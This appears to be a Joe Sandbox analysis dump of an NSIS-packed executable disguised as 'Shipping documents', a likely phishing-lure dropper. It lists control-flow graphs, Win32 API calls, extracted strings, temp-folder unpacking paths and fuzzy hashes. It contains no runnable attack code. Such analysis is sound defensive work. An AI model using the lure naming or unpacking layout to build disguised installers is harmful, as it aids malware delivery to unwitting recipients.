                                                control_flow_graph 167 403c55-403c67 168 403da8-403db7 167->168 169 403c6d-403c73 167->169 171 403e06-403e1b 168->171 172 403db9-403e01 GetDlgItem * 2 call 40412d SetClassLongW call 40140b 168->172 169->168 170 403c79-403c82 169->170 173 403c84-403c91 SetWindowPos 170->173 174 403c97-403c9a 170->174 176 403e5b-403e60 call 404179 171->176 177 403e1d-403e20 171->177 172->171 173->174 179 403cb4-403cba 174->179 180 403c9c-403cae ShowWindow 174->180 186 403e65-403e80 176->186 182 403e22-403e2d call 401389 177->182 183 403e53-403e55 177->183 187 403cd6-403cd9 179->187 188 403cbc-403cd1 DestroyWindow 179->188 180->179 182->183 198 403e2f-403e4e SendMessageW 182->198 183->176 185 4040fa 183->185 193 4040fc-404103 185->193 191 403e82-403e84 call 40140b 186->191 192 403e89-403e8f 186->192 196 403cdb-403ce7 SetWindowLongW 187->196 197 403cec-403cf2 187->197 194 4040d7-4040dd 188->194 191->192 201 403e95-403ea0 192->201 202 4040b8-4040d1 DestroyWindow EndDialog 192->202 194->185 199 4040df-4040e5 194->199 196->193 203 403d95-403da3 call 404194 197->203 204 403cf8-403d09 GetDlgItem 197->204 198->193 199->185 208 4040e7-4040f0 ShowWindow 199->208 201->202 209 403ea6-403ef3 call 405f0a call 40412d * 3 GetDlgItem 201->209 202->194 203->193 205 403d28-403d2b 204->205 206 403d0b-403d22 SendMessageW IsWindowEnabled 204->206 210 403d30-403d33 205->210 211 403d2d-403d2e 205->211 206->185 206->205 208->185 237 403ef5-403efa 209->237 238 403efd-403f39 ShowWindow KiUserCallbackDispatcher call 40414f EnableWindow 209->238 215 403d41-403d46 210->215 216 403d35-403d3b 210->216 214 403d5e-403d63 call 404106 211->214 214->203 218 403d7c-403d8f SendMessageW 215->218 220 403d48-403d4e 215->220 216->218 219 403d3d-403d3f 216->219 218->203 219->214 223 403d50-403d56 call 40140b 220->223 224 403d65-403d6e call 40140b 220->224 235 403d5c 223->235 224->203 233 403d70-403d7a 224->233 233->235 235->214 237->238 241 403f3b-403f3c 238->241 242 403f3e 238->242 243 403f40-403f6e GetSystemMenu EnableMenuItem SendMessageW 241->243 242->243 244 403f70-403f81 SendMessageW 243->244 245 403f83 243->245 246 403f89-403fc7 call 404162 call 405ee8 lstrlenW call 405f0a SetWindowTextW call 401389 244->246 245->246 246->186 255 403fcd-403fcf 246->255 255->186 256 403fd5-403fd9 255->256 257 403ff8-40400c DestroyWindow 256->257 258 403fdb-403fe1 256->258 257->194 260 404012-40403f CreateDialogParamW 257->260 258->185 259 403fe7-403fed 258->259 259->186 261 403ff3 259->261 260->194 262 404045-40409c call 40412d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 260->262 261->185 262->185 267 40409e-4040b1 ShowWindow call 404179 262->267 269 4040b6 267->269 269->194
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
                                                • ShowWindow.USER32(?), ref: 00403CAE
                                                • DestroyWindow.USER32 ref: 00403CC2
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
                                                • GetDlgItem.USER32(?,?), ref: 00403CFF
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
                                                • IsWindowEnabled.USER32(00000000), ref: 00403D1A
                                                • GetDlgItem.USER32(?,00000001), ref: 00403DC8
                                                • GetDlgItem.USER32(?,00000002), ref: 00403DD2
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
                                                • GetDlgItem.USER32(?,00000003), ref: 00403EE3
                                                • ShowWindow.USER32(00000000,?), ref: 00403F04
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
                                                • EnableWindow.USER32(?,?), ref: 00403F31
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
                                                • EnableMenuItem.USER32(00000000), ref: 00403F4E
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
                                                • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
                                                • SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
                                                • ShowWindow.USER32(?,0000000A), ref: 004040EA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID: 4Te
                                                • API String ID: 3282139019-1059887577
                                                • Opcode ID: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                                                • Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
                                                • Opcode Fuzzy Hash: 0e378b7e1c055dadc5f2245ae5d1f830601bd13248d237f6f4b4b38bec7435ce
                                                • Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 270 4038b2-4038ca call 406252 273 4038cc-4038dc call 405e2f 270->273 274 4038de-403915 call 405db5 270->274 281 403938-403961 call 403b88 call 405a3b 273->281 279 403917-403928 call 405db5 274->279 280 40392d-403933 lstrcatW 274->280 279->280 280->281 288 4039f3-4039fb call 405a3b 281->288 289 403967-40396c 281->289 295 403a09-403a2e LoadImageW 288->295 296 4039fd-403a04 call 405f0a 288->296 289->288 290 403972-40398c call 405db5 289->290 294 403991-40399a 290->294 294->288 297 40399c-4039a0 294->297 299 403a30-403a60 RegisterClassW 295->299 300 403aaf-403ab7 call 40140b 295->300 296->295 302 4039b2-4039be lstrlenW 297->302 303 4039a2-4039af call 405960 297->303 304 403a66-403aaa SystemParametersInfoW CreateWindowExW 299->304 305 403b7e 299->305 311 403ac1-403acc call 403b88 300->311 312 403ab9-403abc 300->312 309 4039c0-4039ce lstrcmpiW 302->309 310 4039e6-4039ee call 405933 call 405ee8 302->310 303->302 304->300 307 403b80-403b87 305->307 309->310 315 4039d0-4039da GetFileAttributesW 309->315 310->288 323 403ad2-403aef ShowWindow LoadLibraryW 311->323 324 403b55-403b56 call 405265 311->324 312->307 316 4039e0-4039e1 call 40597f 315->316 317 4039dc-4039de 315->317 316->310 317->310 317->316 326 403af1-403af6 LoadLibraryW 323->326 327 403af8-403b0a GetClassInfoW 323->327 328 403b5b-403b5d 324->328 326->327 329 403b22-403b45 DialogBoxParamW call 40140b 327->329 330 403b0c-403b1c GetClassInfoW RegisterClassW 327->330 331 403b77-403b79 call 40140b 328->331 332 403b5f-403b65 328->332 336 403b4a-403b53 call 403802 329->336 330->329 331->305 332->312 334 403b6b-403b72 call 40140b 332->334 334->312 336->307
                                                APIs
                                                  • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                                                  • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                                                  • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                                                • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\Shipping documents 000293994900.exe"), ref: 00403933
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\Uploadable\normallnnens,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                                                • GetFileAttributesW.KERNEL32(Call), ref: 004039D1
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\Uploadable\normallnnens), ref: 00403A1A
                                                  • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                • RegisterClassW.USER32(00428180), ref: 00403A57
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                                                • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                                                • RegisterClassW.USER32(00428180), ref: 00403B1C
                                                • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Uploadable\normallnnens$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 914957316-2395347289
                                                • Opcode ID: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
                                                • Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
                                                • Opcode Fuzzy Hash: 026d5a3465d614f87136ed0c1228ce7353d28a0e64fd29dc9081dcfbce6d88a6
                                                • Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 341 402dba-402e08 GetTickCount GetModuleFileNameW call 405b54 344 402e14-402e42 call 405ee8 call 40597f call 405ee8 GetFileSize 341->344 345 402e0a-402e0f 341->345 353 402f32-402f40 call 402d18 344->353 354 402e48-402e5f 344->354 346 403059-40305d 345->346 361 403011-403016 353->361 362 402f46-402f49 353->362 356 402e61 354->356 357 402e63-402e70 call 4032f7 354->357 356->357 363 402e76-402e7c 357->363 364 402fcd-402fd5 call 402d18 357->364 361->346 365 402f75-402fc1 GlobalAlloc call 40636e call 405b83 CreateFileW 362->365 366 402f4b-402f63 call 40330d call 4032f7 362->366 367 402efc-402f00 363->367 368 402e7e-402e96 call 405b0f 363->368 364->361 392 402fc3-402fc8 365->392 393 402fd7-403007 call 40330d call 403060 365->393 366->361 389 402f69-402f6f 366->389 372 402f02-402f08 call 402d18 367->372 373 402f09-402f0f 367->373 368->373 387 402e98-402e9f 368->387 372->373 379 402f11-402f1f call 406300 373->379 380 402f22-402f2c 373->380 379->380 380->353 380->354 387->373 391 402ea1-402ea8 387->391 389->361 389->365 391->373 394 402eaa-402eb1 391->394 392->346 401 40300c-40300f 393->401 394->373 396 402eb3-402eba 394->396 396->373 398 402ebc-402edc 396->398 398->361 400 402ee2-402ee6 398->400 403 402ee8-402eec 400->403 404 402eee-402ef6 400->404 401->361 402 403018-403029 401->402 405 403031-403036 402->405 406 40302b 402->406 403->353 403->404 404->373 407 402ef8-402efa 404->407 408 403037-40303d 405->408 406->405 407->373 408->408 409 40303f-403057 call 405b0f 408->409 409->346
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402DCE
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000293994900.exe,00000400), ref: 00402DEA
                                                  • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00405B58
                                                  • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000293994900.exe,C:\Users\user\Desktop\Shipping documents 000293994900.exe,80000000,00000003), ref: 00402E33
                                                • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: "C:\Users\user\Desktop\Shipping documents 000293994900.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000293994900.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 2803837635-3190598174
                                                • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
                                                • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                • Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C
                                                APIs
                                                  • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
                                                  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
                                                • GlobalFree.KERNEL32(00000000), ref: 10001CAF
                                                • GlobalFree.KERNEL32(?), ref: 10001DA9
                                                • GlobalFree.KERNEL32(?), ref: 10001DAE
                                                • GlobalFree.KERNEL32(?), ref: 10001DB3
                                                • GlobalFree.KERNEL32(00000000), ref: 10001F57
                                                • lstrcpyW.KERNEL32(?,?), ref: 100020BB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3053243332.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.3053194517.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053257984.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.3053272824.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc
                                                • String ID:
                                                • API String ID: 4227406936-0
                                                • Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                • Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
                                                • Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
                                                • Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 737 401752-401777 call 402b38 call 4059aa 742 401781-401793 call 405ee8 call 405933 lstrcatW 737->742 743 401779-40177f call 405ee8 737->743 748 401798-401799 call 40617c 742->748 743->748 752 40179e-4017a2 748->752 753 4017a4-4017ae call 40622b 752->753 754 4017d5-4017d8 752->754 761 4017c0-4017d2 753->761 762 4017b0-4017be CompareFileTime 753->762 755 4017e0-4017fc call 405b54 754->755 756 4017da-4017db call 405b2f 754->756 764 401870-401899 call 405192 call 403060 755->764 765 4017fe-401801 755->765 756->755 761->754 762->761 777 4018a1-4018ad SetFileTime 764->777 778 40189b-40189f 764->778 766 401852-40185c call 405192 765->766 767 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 765->767 779 401865-40186b 766->779 767->752 799 401847-401848 767->799 781 4018b3-4018be CloseHandle 777->781 778->777 778->781 782 4029ce 779->782 786 4018c4-4018c7 781->786 787 4029c5-4029c8 781->787 785 4029d0-4029d4 782->785 789 4018c9-4018da call 405f0a lstrcatW 786->789 790 4018dc-4018df call 405f0a 786->790 787->782 796 4018e4-402241 call 4056c4 789->796 790->796 796->785 799->779 801 40184a-40184b 799->801 801->766
                                                APIs
                                                • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 00401793
                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\Uploadable\normallnnens,?,?,00000031), ref: 004017B8
                                                  • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                  • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp$C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll$C:\Users\user\Uploadable\normallnnens$Call
                                                • API String ID: 1941528284-855634427
                                                • Opcode ID: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
                                                • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                • Opcode Fuzzy Hash: c934a5f4023ad52aa090981e8ce84fa05bfe414c99e0bb626fd2f32e4f320a2f
                                                • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 803 405192-4051a7 804 4051ad-4051be 803->804 805 40525e-405262 803->805 806 4051c0-4051c4 call 405f0a 804->806 807 4051c9-4051d5 lstrlenW 804->807 806->807 809 4051f2-4051f6 807->809 810 4051d7-4051e7 lstrlenW 807->810 812 405205-405209 809->812 813 4051f8-4051ff SetWindowTextW 809->813 810->805 811 4051e9-4051ed lstrcatW 810->811 811->809 814 40520b-40524d SendMessageW * 3 812->814 815 40524f-405251 812->815 813->812 814->815 815->805 816 405253-405256 815->816 816->805
                                                APIs
                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll), ref: 004051FF
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3039870384.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.3039857666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039884804.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039897627.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3039983496.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Shipping documents 000293994900.jbxd
                                                Similarity
                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll
                                                • API String ID: 2531174081-4273610947
                                                • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 817 40317b-4031a4 GetTickCount 818 4032e5-4032ed call 402d18 817->818 819 4031aa-4031d5 call 40330d SetFilePointer 817->819 824 4032ef-4032f4 818->824 825 4031da-4031ec 819->825 826 4031f0-4031fe call 4032f7 825->826 827 4031ee 825->827 830 403204-403210 826->830 831 4032d7-4032da 826->831 827->826 832 403216-40321c 830->832 831->824 833 403247-403263 call 40638e 832->833 834 40321e-403224 832->834 840 4032e0 833->840 841 403265-40326d 833->841 834->833 835 403226-403246 call 402d18 834->835 835->833 842 4032e2-4032e3 840->842 843 4032a1-4032a7 841->843 844 40326f-403285 WriteFile 841->844 842->824 843->840 845 4032a9-4032ab 843->845 846 403287-40328b 844->846 847 4032dc-4032de 844->847 845->840 848 4032ad-4032c0 845->848 846->847 849 40328d-403299 846->849 847->842 848->825 851 4032c6-4032d5 SetFilePointer 848->851 849->832 850 40329f 849->850 850->848 851->818
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00403190
                                                  • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                • WriteFile.KERNELBASE(0040BE78,0040DB10,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                • SetFilePointer.KERNELBASE(00006EB9,00000000,00000000,00413E78,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                Strings
                                                Memory Dump Source
